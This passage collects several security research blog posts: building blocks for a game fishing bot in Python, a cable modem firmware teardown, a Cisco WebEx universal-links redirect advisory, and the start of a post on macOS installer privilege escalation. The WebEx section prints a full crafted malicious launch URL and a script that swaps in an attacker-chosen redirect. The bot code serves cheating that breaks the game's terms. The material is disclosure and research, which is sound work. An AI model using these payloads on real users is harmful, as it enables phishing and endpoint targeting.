In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which incidentally, are noted to have been detected by the anti-cheat and gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what’re the components we’ll need:

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss
import mss.tools

while True:
    # 500x500 pixel region
    region = (500, 500, 1000, 1000)
    with mss.mss() as screen:
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
import mss.tools
import numpy as np

to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)

while True:
    # 500x500 pixel region
    region = (500, 500, 1000, 1000)

    # Grab region
    with mss.mss() as screen:
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

    # Convert image to format usable by cv2 (mss returns BGRA pixels)
    img_cv = cv2.cvtColor(np.array(img), cv2.COLOR_BGRA2BGR)

    # Check if the tenable logo is present
    result = cv2.matchTemplate(img_cv, to_detect, cv2.TM_CCOEFF_NORMED)
    if (result >= 0.6).any():
        print('DETECTED')
        break

Running the above and dragging the logo image into the monitored region of the screen will trigger the “DETECTED” message. Note that this snippet may not work exactly as written depending on your monitor setup and configured resolution; some values may need to be tweaked for your environment.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.
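For completeness, here is what that last building block might look like with pynput (a generic example, not tied to any particular game or bot):

from pynput.mouse import Button, Controller

# Move the cursor into the monitored region and click once the
# template has been detected.
mouse = Controller()
mouse.position = (750, 750)  # center of the 500x500 region above
mouse.click(Button.left, 1)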

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.



ARRIS CABLE MODEM TEARDOWN

8 September 2021 at 13:03

Picked up one of these a little while back at the behest of a good friend.

https://www.surfboard.com/globalassets/surfboard-new/products/sb8200/sb8200-pro-detail-header-hero-1.png

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.

THE HARDWARE

There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.

THE FIRMWARE

Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat

PARSING THE FIRMWARE

Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd

Jackpot.

Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on "brcmnand.1":
0x000000000000-0x000000620000 : "flash1.kernel0"
0x000000620000-0x000000c40000 : "flash1.kernel1"
0x000000c40000-0x000001fa0000 : "flash1.cm0"
0x000001fa0000-0x000003300000 : "flash1.cm1"
0x000003300000-0x000005980000 : "flash1.rg0"
0x000005980000-0x000008000000 : "flash1.rg1"
0x000000000000-0x000008000000 : "flash1"
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on "spi32766.0":
0x000000000000-0x000000100000 : "flash0.bolt"
0x000000100000-0x000000120000 : "flash0.macadr"
0x000000120000-0x000000140000 : "flash0.nvram"
0x000000140000-0x000000160000 : "flash0.nvram1"
0x000000160000-0x000000180000 : "flash0.devtree0"
0x000000180000-0x0000001a0000 : "flash0.devtree1"
0x0000001a0000-0x000000200000 : "flash0.cmnonvol0"
0x000000200000-0x000000260000 : "flash0.cmnonvol1"
0x000000260000-0x000000330000 : "flash0.rgnonvol0"
0x000000330000-0x000000400000 : "flash0.rgnonvol1"
0x000000000000-0x000000400000 : "flash0"

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=0x2680000 skip=0x5980000
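The skip and count values come straight from the flash1.rg1 entry in the MTD table above: the partition runs from 0x5980000 to 0x8000000, so its size is 0x8000000 - 0x5980000 = 0x2680000 bytes.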

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

This hints that we are likely looking at an adjacent layout. The following python script will handle stripping the spare data out of our dump.

data_area = 512
spare = 16
combined = data_area + spare

with open('rg1', 'rb') as f:
    dump = f.read()

count = int(len(dump) / combined)
out = b''
for i in range(count):
    # Keep the data area of each section, drop the spare/OOB bytes
    out = out + dump[i*combined : i*combined + data_area]

with open('rg1_stripped', 'wb') as f:
    f.write(out)

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
    dump = f.read()

with open('rg1_little', 'wb') as f:
    # Page size is 2048
    block = 2048
    nblocks = int(len(dump) / block)

    # Iterate over blocks, byte swap each 32-bit value
    for i in range(0, nblocks):
        current_block = dump[i*block:(i+1)*block]
        j = 0
        while j < len(current_block):
            section = current_block[j:j+4]
            f.write(section[::-1])
            j = j + 4

Extract

Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs

Conclusion

Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!



Cisco WebEx Universal Links Redirect

31 August 2021 at 15:56

What’s dumber than an open redirect? This.

The following is a quick and dirty companion write-up for TRA-2021–34. The issue described has been fixed by the vendor.

After being forced to use WebEx a little while back, I noticed that the URIs and protocol handlers for it on macOS contained more information than you typically see, so I decided to investigate. There are a handful of valid protocol handlers for WebEx, but the one I’ll reference for the rest of this blog is “webexstart://”.

When you visit a meeting invite for any of the popular video chat apps these days, you typically get redirected to some sort of launchpad webpage that grabs the meeting information behind the scenes and then makes a request using the appropriate protocol handler in the background, which is then used to launch the corresponding application. This is generally a pretty seamless and straightforward process for end-users. Interrupting this process and looking behind the scenes, however, can give us a good look at the information required to construct this handler. A typical protocol handler constructed for Cisco WebEx looks like this:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9\/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSW1OdmJXMXZiaUk2SUhzS0lDQWdJQ0FnSUNBaVJHVnNZWGxTWldScGNtVmpkQ0k2SUNKMGNuVmxJZ29nSUNBZ2ZTd0tJQ0FnSUNKM1pXSmxlQ0k2SUhzS0lDQWdJQ0FnSUNBaVNtOXBia1pwY25OMFFteGhZMnRNYVhOMElqb2dXd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJalF4TGpRaUxBb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lqUXhMalVpQ2lBZ0lDQWdJQ0FnWFFvZ0lDQWdmU3dLSUNBZ0lDSmxkbVZ1ZENJNklIc0tDaUFnSUNCOUxBb2odJQ0FnSW5SeVlXbHVhVzVuSWpvZ2V3b0tJQ0FnSUgwc0NpQWdJQ0FpYzNWd2NHOXlkQ0k2SUhzS0lDQWdJQ0FnSUNBaVIzQmpRMjl0Y0c5dVpXNTBUbUZ0WlNJNklDSkRhWE5qYnlCWFpXSmxlQ0JUZFhCd2IzSjBMbUZ3Y0NJS0lDQWdJSDBLZlFvPSIsInVsaW5rIjoiYUhSMGNITTZMeTl0WldWME1URXpMbmRsWW1WNExtTnZiUzkzWW5odGFuTXZhbTlwYm5ObGNuWnBZMlV2YzJsMFpYTXZiV1ZsZERFeE15OXRaV1YwYVc1bkwzTmxkSFZ3ZFc1cGRtVnljMkZzYkdsdWEzTS9jMmwwWlhWeWJEMXRaV1YwTVRFekptMWxaWFJwYm1kclpYazlNVGd5TWpnMk5qTTBOeVpqYjI1MFpYaDBTVVE5YzJWMGRYQjFibWwyWlhKellXeHNhVzVyWHpBek16azFZamN3WmpjMU1UUmpPR1U0TTJJek5qZ3lNV1V4T1dZd05UVXlYekUyTWpNNU5UQTBNVGMzTURZbWRHOXJaVzQ5VTBSS1ZGTjNRVUZCUVZoWVlqVkVMVTFtTUZKZlVXcHFka3BTWkdacmJFRmFZVzkxY1Voa1RYbHVjSFppWHpCS1IyeFJhVEYzTWlac1lXNW5kV0ZuWlQxbGJsOVZVdz09IiwidXRvZ2dsZSI6IjEiLCJtZSI6IjEiLCJqZnYiOiIxIiwidGlmIjoiUEQ5NGJXd2dkbVZ5YzJsdmJqMGlNUzR3SWlCbGJtTnZaR2x1WnowaVZWUkdMVGdpUHo0S1BGUmxiR1ZOWlhSeWVVbHVabTgrUEUxbGRISnBZM05GYm1GaWJHVStNVHd2VFdWMGNtbGpjMFZ1WVdKc1pUNDhUV1YwY21samMxVlNURDVvZEhSd2N6b3ZMM1J6WVRNdWQyVmlaWGd1WTI5dEwyMWxkSEpwWXk5Mk1Ud3ZUV1YwY21samMxVlNURDQ4VFdWMGNtbGpjMUJoY21GdFpYUmxjbk0rUEUxbGRISnBZM05VYVdOclpYUStVbnBJTHk5M1FVRkJRVmhqUkhCSlFTOVFja0ZWSzJGeWFXTnliVEF3TlRjMVpubFZUM0EwVFc4d1NrTnpWVXh0V2pKR1IyTkJQVDA4TDAxbGRISnBZM05VYVdOclpYUStQRU52Ym1aSlJENHhPVGN4T1RnME5UYzBNakkzTnpJek5EYzhMME52Ym1aSlJENDhVMmwwWlVsRVBqRTBNakkyTXpZeVBDOVRhWFJsU1VRK1BGUnBiV1ZUZEdGdGNENHhOakl6T0RZME1ERTNOekEzUEM5VWFXMWxVM1JoYlhBK1BFRlFVRTVoYldVK1UyVnpjMmx2Ymt0bGVUd3ZRVkJRVG1GdFpUNDhMMDFsZEhKcFkzTlFZWEpoYldWMFpYSnpQanhOWlhSeWFXTnpSVzVoWW14bFRXVmthV0ZSZFdGc2FYUjVSWFpsYm5RK01Ud3ZUV1YwY21samMwVnVZV0pzWlUxbFpHbGhVWFZoYkdsMGVVVjJaVzUwUGp3dlZHVnNaVTFsZEhKNVNXNW1iejQ9In0=

While there are several components to this URL, we’ll focus on the last one — ‘p’. ‘p’ is a base64 encoded string that contains settings information such as support app information, telemetry configurations, and the information required to set up Universal Links for macOS. When decoding the above, we can see that ‘p’ decodes to:

{“uuid”:”8e18fa93cd10432a907c94fb9d3a63e6",”cv”:”41.6.4.8",”cwsv”:”11,41,0604,210608,0",”st”:”MC”,”pv”:”T33_64UMC”,”cn”:”ATCONFUI.BUNDLE”,”flag”:33554432,”ejf”:”2",”cpp”:”ewogICAgImNvbW1vbiI6IHsKICAgICAgICAiRGVsYXlSZWRpcmVjdCI6ICJ0cnVlIgogICAgfSwKICAgICJ3ZWJleCI6IHsKICAgICAgICAiSm9pbkZpcnN0QmxhY2tMaXN0IjogWwogICAgICAgICAgICAgICAgIjQxLjQiLAogICAgICAgICAgICAgICAgIjQxLjUiCiAgICAgICAgXQogICAgfSwKICAgICJldmVudCI6IHsKCiAgICB9LAogICAgInRyYWluaW5nIjogewoKICAgIH0sCiAgICAic3VwcG9ydCI6IHsKICAgICAgICAiR3BjQ29tcG9uZW50TmFtZSI6ICJDaXNjbyBXZWJleCBTdXBwb3J0LmFwcCIKICAgIH0KfQo=”,”ulink”:”aHR0cHM6Ly9tZWV0MTEzLndlYmV4LmNvbS93YnhtanMvam9pbnNlcnZpY2Uvc2l0ZXMvbWVldDExMy9tZWV0aW5nL3NldHVwdW5pdmVyc2FsbGlua3M/c2l0ZXVybD1tZWV0MTEzJm1lZXRpbmdrZXk9MTgyMDIxMDYwOCZjb250ZXh0SUQ9c2V0dXB1bml2ZXJzYWxsaW5rXzNlNjNjZDFlODcyMzRlOTE4OWU2OWM2NjI2MDcxMzBiXzE2MjQwMjA4ODUwNTImdG9rZW49U0RKVFN3QUFBQVd4c0pGelhzSW1Da2l3aHQya2t4TE1WWFdJVFZpTTh4OWVnUWJlejVUaWhBMiZsYW5ndWFnZT1lbl9VUw==”,”utoggle”:”1",”me”:”1",”jfv”:”1",”tif”:”PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPFRlbGVNZXRyeUluZm8+PE1ldHJpY3NFbmFibGU+MTwvTWV0cmljc0VuYWJsZT48TWV0cmljc1VSTD5odHRwczovL3RzYTMud2ViZXguY29tL21ldHJpYy92MTwvTWV0cmljc1VSTD48TWV0cmljc1BhcmFtZXRlcnM+PE1ldHJpY3NUaWNrZXQ+UnpILy93QUFBQVVoVE5VSXhKcThuKzR4N0djY2c5S1NFRWFqVHZ2aDQrWkxLSmIzTnh3aElnPT08L01ldHJpY3NUaWNrZXQ+PENvbmZJRD4xOTczMDMyMzQxNzY1MTQ3NDE8L0NvbmZJRD48U2l0ZUlEPjE0MjI2MzYyPC9TaXRlSUQ+PFRpbWVTdGFtcD4xNjIzOTM0NDg1MDUyPC9UaW1lU3RhbXA+PEFQUE5hbWU+U2Vzc2lvbktleTwvQVBQTmFtZT48L01ldHJpY3NQYXJhbWV0ZXJzPjxNZXRyaWNzRW5hYmxlTWVkaWFRdWFsaXR5RXZlbnQ+MTwvTWV0cmljc0VuYWJsZU1lZGlhUXVhbGl0eUV2ZW50PjwvVGVsZU1ldHJ5SW5mbz4=”}

From this output, we have a parameter called ‘ulink’. Further decoding this parameter gets us:

https://meet113.webex.com/wbxmjs/joinservice/sites/meet113/meeting/setupuniversallinks?siteurl=meet113&meetingkey=1820210608&contextID=setupuniversallink_3e63cd1e87234e9189e69c662607130b_1624020885052&token=SDJTSwAAAAWxsJFzXsImCkiwht2kkxLMVXWITViM8x9egQbez5TihA2&language=en_US
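If you want to reproduce the decoding yourself, it only takes a couple of commands. The sketch below is purely illustrative: it assumes the captured webexstart:// URL has been saved to a file called handler.txt (my own convention, not anything WebEx provides), and python3 is used here only as a convenient JSON parser.

# Pull the 'p' query parameter out of the captured handler URL and decode it.
P_BLOB=$(sed -n 's/.*[&?]p=\([^&]*\).*/\1/p' handler.txt)
echo "$P_BLOB" | base64 -D > p.json   # -D is the decode flag on macOS; use -d on Linux
# The decoded JSON contains the 'ulink' field, which is itself base64 encoded.
python3 -c 'import json, base64; d = json.load(open("p.json")); print(base64.b64decode(d["ulink"]).decode())'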

This parameter corresponds to what’s known as “Universal Links” in the Apple ecosystem. This is the magical mechanism that allows certain URL patterns to automatically be opened with a preferred app. For example, if universal links were configured for Reddit on your iPhone, clicking any link starting with “reddit.com” would automatically open that link in the Reddit app instead of in the browser. The ‘ulink’ parameter above is meant to set up this convenience feature for WebEx.

The following image explains how this link travels through the WebEx application flow:

At no point in this flow is the ‘ulink’ parameter validated, sanitized, or modified in any way. This means that an attacker could construct a fake WebEx meeting invite (whether through a malicious domain or simply by getting someone to click the protocol handler directly in Slack or some other chat app) and supply their own custom ‘ulink’ parameter.

For example, the following URL will open WebEx, and upon closing the application, Safari will be opened to https://tenable.com:

webexstart://launch/V2ViRXhfbWNfbWVldDExMy1lbl9fbWVldDExMy53ZWJleC5jb21fZXlKMGIydGxiaUk2SW5CRVVGbDFUSHBpV0ZjaUxDSmtiM2R1Ykc5aFpFOXViSGtpT21aaGJITmxMQ0psYm1GaWJHVkpia0Z3Y0VwdmFXNGlPblJ5ZFdVc0ltOXVaVlJwYldWVWIydGxiaUk2SWlJc0lteGhibWQxWVdkbFNXUWlPakVzSW1OdmNuSmxiR0YwYVc5dVNXUWlPaUpqTVRnd1kyVXlNQzFtTWpKaExUUTFZamt0T1RFd09TMDVZVFk1TlRRelpHTmlOREVpTENKMGNtRmphMmx1WjBsRUlqb2lkMlZpWlhndGQyVmlMV05zYVdWdWRGOWpNemRsTkdFMVlTMHpPRGxtTFRRek1qZ3RPVEl5WlMwM1lqTTBaREl4TTJZeVpUQmZNVFl5TXpnMk5EQXhOell3TlNJc0ltTmtia2h2YzNRaU9pSmhhMkZ0WVdsalpHNHVkMlZpWlhndVkyOXRJaXdpY21WbmRIbHdaU0k2SWpFeUpUZzJJbjA9/V2?t=99999999999999&t1=%URLProtocolLaunchTime%&[email protected]&p=eyJ1dWlkIjoiNGVjYjdlNTJhODI3NGYzN2JlNDFhZWY1NTMxZDg3MmMiLCJjdiI6IjQxLjYuNC44IiwiY3dzdiI6IjExLDQxLDA2MDQsMjEwNjA4LDAiLCJzdCI6Ik1DIiwibXRpZCI6Im02NjkyMGNlNzJkMzYwMGEyNDZiMWUxMGE4YWY5MmJkNyIsInB2IjoiVDMzXzY0VU1DIiwiY24iOiJBVENPTkZVSS5CVU5ETEUiLCJmbGFnIjozMzU1NDQzMiwiZWpmIjoiMiIsImNwcCI6ImV3b2dJQ0FnSUNBZ0lDSmpiMjF0YjI0aU9pQjdDaUFnSUNBZ0lDQWdJa1JsYkdGNVVtVmthWEpsWTNRaU9pQWlabUZzYzJVaUNpQWdJQ0I5TEFvZ0lDQWdJbmRsWW1WNElqb2dld29nSUNBZ0lDQWdJQ0pLYjJsdVJtbHljM1JDYkdGamEweHBjM1FpT2lCYkNpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBaU5ERXVOQ0lzQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FpTkRFdU5TSUtJQ0FnSUNBZ0lDQmRDaUFnSUNCOUxBb2dJQ0FnSW1WMlpXNTBJam9nZXdvS0lDQWdJSDBzQ2lBZ0lDQWlkSEpoYVc1cGJtY2lPaUI3Q2dvZ0lDQWdmU3dLSUNBZ0lDSnpkWEJ3YjNKMElqb2dld29nSUNBZ0lDQWdJQ0pIY0dORGIyMXdiMjVsYm5ST1lXMWxJam9nSWtOcGMyTnZJRmRsWW1WNElGTjFjSEJ2Y25RdVlYQndJZ29nSUNBZ2ZRb2dJQ0FnZlFvZ0lDQWciLCJ1bGluayI6ImFIUjBjSE02THk5MFpXNWhZbXhsTG1OdmJRPT0iLCJ1dG9nZ2xlIjoiMSIsIm1lIjoiMSIsImpmdiI6IjEiLCJ0aWYiOiJQRDk0Yld3Z2RtVnljMmx2YmowaU1TNHdJaUJsYm1OdlpHbHVaejBpVlZSR0xUZ2lQejQ4VkdWc1pVMWxkSEo1U1c1bWJ6NDhUV1YwY21samMwVnVZV0pzWlQ0d1BDOU5aWFJ5YVdOelJXNWhZbXhsUGp4TlpYUnlhV056VlZKTVBtaDBkSEJ6T2k4dmRITmhNeTUzWldKbGVDNWpiMjB2YldWMGNtbGpMM1l4UEM5TlpYUnlhV056VlZKTVBqeE5aWFJ5YVdOelVHRnlZVzFsZEdWeWN6NDhUV1YwY21samMxUnBZMnRsZEQ1U2VrZ3ZMM2RCUVVGQldHTkVjRWxCTDFCeVFWVXJZWEpwWTNKdE1EQTFOelZtZVZWUGNEUk5iekJLUTNOVlRHMWFNa1pIWTBFOVBUd3ZUV1YwY21samMxUnBZMnRsZEQ0OFEyOXVaa2xFUGpFNU56RTVPRFExTnpReU1qYzNNak0wTnp3dlEyOXVaa2xFUGp4VGFYUmxTVVErTVRReU1qWXpOakk4TDFOcGRHVkpSRDQ4VkdsdFpWTjBZVzF3UGpFMk1qTTROalF3TVRjM01EYzhMMVJwYldWVGRHRnRjRDQ4UVZCUVRtRnRaVDVUWlhOemFXOXVTMlY1UEM5QlVGQk9ZVzFsUGp3dlRXVjBjbWxqYzFCaGNtRnRaWFJsY25NK1BFMWxkSEpwWTNORmJtRmliR1ZOWldScFlWRjFZV3hwZEhsRmRtVnVkRDR4UEM5TlpYUnlhV056Ulc1aFlteGxUV1ZrYVdGUmRXRnNhWFI1UlhabGJuUStQQzlVWld4bFRXVjBjbmxKYm1adlBnPT0ifQ==
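For a sense of how little effort that takes, here is a rough sketch of how the modified blob could be assembled. It reuses the p.json produced by the earlier decoding snippet (again, my own file name), swaps in an attacker-controlled ‘ulink’, and prints a re-encoded value that can be dropped back into the ‘p’ parameter of an otherwise valid handler URL.

# Encode the redirect target we want Safari to open after WebEx exits.
EVIL_ULINK=$(printf 'https://tenable.com' | base64)
# Replace the 'ulink' value in the previously decoded blob and re-encode the whole thing.
python3 - "$EVIL_ULINK" <<'EOF'
import base64, json, sys
blob = json.load(open("p.json"))
blob["ulink"] = sys.argv[1]
print(base64.b64encode(json.dumps(blob).encode()).decode())
EOF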

The following gif demonstrates this functionality.

It may also be possible for a specially crafted URL to contain modified domains used for telemetry data, debug information, or other configurable options, which could lead to possible information disclosures.

To be clear, this flaw requires user interaction and is of relatively low impact. The attack already depends on tricking a user into visiting a malicious link (a fake meeting invite served from a custom domain, for example) and then allowing WebEx to launch from their browser. In general, we wouldn’t report this sort of issue because no security boundary is crossed by getting someone to click a malicious link on its own; that’s too silly for even me to report. In this case, however, a boundary is crossed: we are able to force the victim to open a malicious link in a specific browser (Safari), which allows an attacker to specially craft payloads for that target browser.

In short, this is a pretty lame but fun bug. While exploiting it is tantamount to getting a user to click something malicious in the first place, it does give an attacker more control over the endpoint they are able to craft payloads for.

Hopefully, you find it at least a little entertaining as well. :)


Cisco WebEx Universal Links Redirect was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

3 June 2021 at 13:02

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and, in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020–9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.
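To make that concrete, a postinstall script that sets up a root Launch Daemon often looks something like the deliberately simplified sketch below. The bundle path, label, and binary name are placeholders of my own, not taken from any particular product.

#!/bin/sh
# postinstall -- runs as root once the user authorizes an elevated install.
# Hypothetical helper binary the vendor wants running as a root daemon.
DAEMON_BIN="/Applications/Example.app/Contents/MacOS/example-updater"
PLIST="/Library/LaunchDaemons/com.example.updater.plist"
# Write a Launch Daemon definition pointing at the binary above.
cat > "$PLIST" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.updater</string>
    <key>ProgramArguments</key>
    <array><string>$DAEMON_BIN</string></array>
    <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chown root:wheel "$PLIST"
chmod 644 "$PLIST"
launchctl load "$PLIST"
# If a lower-privileged user controlled $DAEMON_BIN before this point
# (e.g. via a pre-created directory tree), root now runs their code.
exit 0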

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020–9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

